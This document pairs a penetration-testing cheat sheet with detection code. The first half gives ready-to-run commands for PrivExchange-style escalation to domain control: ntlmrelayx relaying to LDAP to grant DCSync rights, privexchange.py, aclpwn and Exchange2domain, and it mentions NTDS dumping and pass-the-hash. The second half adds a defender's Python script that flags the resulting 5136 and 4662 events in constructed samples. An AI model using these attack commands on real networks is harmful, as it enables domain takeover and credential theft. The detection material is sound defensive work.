https://github.com/dirkjanm/PrivExchange
https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/
https://chryzsh.github.io/exploiting-privexchange/
# After exploitation you are not Domain Admin directly, so you cannot connect to the
# DC with Domain Admin rights.
# Exploitation gives the user DCSync privileges, which is enough to dump the NTDS database.
# You can then use a Pass-the-Hash attack with the administrator accounts to get real access.
Aclpwn
# ACLpwn is a tool that finds compromise paths in BloodHound data and exploits them.
# BloodHound (its neo4j database) needs to be running.
# Many options are available.
# The -dry option looks for a compromise path without exploiting it.
python aclpwn.py -f user@domain.com -ft user -d domain.com -u user -p password -sp password -du neo4j -dp password -dry
# Without -dry, exploitation is started by default.
python aclpwn.py -f user@domain.com -ft user -d domain.com -u user -p password -sp password -du neo4j -dp password
# The previous privileges can be restored after exploitation with the restore file.
python aclpwn.py -r restore-file
ntlmrelayx / privexchange.py
# NTLM relaying is used to relay the connection to LDAP and give the target user (--escalate-user) DCSync privileges.
ntlmrelayx.py -t ldap://s2016dc.testsegment.local --escalate-user ntu
# The user needs to have a mailbox to exploit it this way.
# After a minute (the value supplied for the push notification) you get the results in ntlmrelayx.
python privexchange.py -ah dev.testsegment.local s2012exc.testsegment.local -u testuser -d testsegment.local
# The attack can also be performed without any credentials, using the httpattack.py file.
# It uses NTLM relaying with LLMNR / NBT-NS to relay captured credentials over the network.
Exchange2domain
# All-in-one tool for PrivExchange.
# Only the web server port needs to be opened, so no high privileges are required.
# Many options are available.
python Exchange2domain.py -ah attackterip -ap listenport -u user -p password -d domain.com -th DCip MailServerip
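A defender-side complement to the notes above, added here and not part of PrivExchange, ntlmrelayx, Aclpwn or Exchange2domain: the relayed Exchange computer account writes a new ACE on the domain object (Windows Security event 5136 on the nTSecurityDescriptor attribute), and the escalated user then issues replication requests (event 4662 carrying the DS-Replication-Get-Changes / DS-Replication-Get-Changes-All control-access GUIDs). The script below runs both checks over sample events. The log lines, the key=value line format (a simplification of the real XML events) and the allowlist of domain-controller accounts are constructed for the example; the two replication GUIDs are the well-known Active Directory values.

```python
"""Flag Security events that indicate a DCSync grant or DCSync use.

Added example; the events below are constructed, not captured logs.
"""
import re

# Well-known AD control-access-right GUIDs checked for DCSync.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_GUIDS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}

GUID_RE = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}")
KV_RE = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|$)")

# Constructed sample events (simplified key=value form, one event per line).
SAMPLE_EVENTS = [
    # A domain controller replicating: expected, covered by the allowlist.
    "EventID=4662 SubjectUserName=DC01$ ObjectType=domainDNS "
    "Properties={1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} AccessMask=0x100",
    # The escalated user replicating: this is DCSync.
    "EventID=4662 SubjectUserName=ntu ObjectType=domainDNS "
    "Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2};{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} "
    "AccessMask=0x100",
    # The Exchange computer account changing the domain object's ACL.
    "EventID=5136 SubjectUserName=S2012EXC$ ObjectDN=DC=testsegment,DC=local "
    "AttributeLDAPDisplayName=nTSecurityDescriptor OperationType=Value Added",
    # Benign noise: an ordinary property read and an ordinary attribute edit.
    "EventID=4662 SubjectUserName=alice ObjectType=user "
    "Properties={bf967a86-0de6-11d0-a285-00aa003049e2} AccessMask=0x10",
    "EventID=5136 SubjectUserName=bob ObjectDN=CN=bob,CN=Users,DC=testsegment,DC=local "
    "AttributeLDAPDisplayName=description OperationType=Value Added",
]

# Accounts that legitimately replicate: DC computer accounts. In a real tenant
# the Azure AD Connect (MSOL_*) account also belongs here.
DEFAULT_ALLOWLIST = frozenset({"DC01$"})


def parse_event(line):
    """Turn one constructed key=value line into a dict."""
    return dict(KV_RE.findall(line))


def is_dcsync_use(ev, allowlist):
    """4662 with a replication control-access GUID from a non-allowlisted account."""
    if ev.get("EventID") != "4662":
        return False
    guids = set(GUID_RE.findall(ev.get("Properties", "").lower()))
    if not guids & REPLICATION_GUIDS:
        return False
    return ev.get("SubjectUserName", "").upper() not in allowlist


def is_domain_acl_change(ev):
    """5136 that rewrites the security descriptor of the domain object itself."""
    return (
        ev.get("EventID") == "5136"
        and ev.get("AttributeLDAPDisplayName") == "nTSecurityDescriptor"
        and ev.get("ObjectDN", "").upper().startswith("DC=")
    )


def detect(lines, allowlist=DEFAULT_ALLOWLIST):
    """Return (finding, account) tuples for every suspicious event."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if is_dcsync_use(ev, allowlist):
            findings.append(("dcsync-replication-request", ev["SubjectUserName"]))
        elif is_domain_acl_change(ev):
            findings.append(("domain-acl-modified", ev["SubjectUserName"]))
    return findings


if __name__ == "__main__":
    for finding, account in detect(SAMPLE_EVENTS):
        print(f"{finding}: {account}")
```

The 5136 check fires on the relay step itself, before any replication happens, and the account it names (here the Exchange server's computer account) is the tell: a mail server has no business rewriting the domain object's ACL. The 4662 check needs object-access auditing enabled on the domain controllers and an allowlist that is kept current, otherwise DC-to-DC replication drowns the signal.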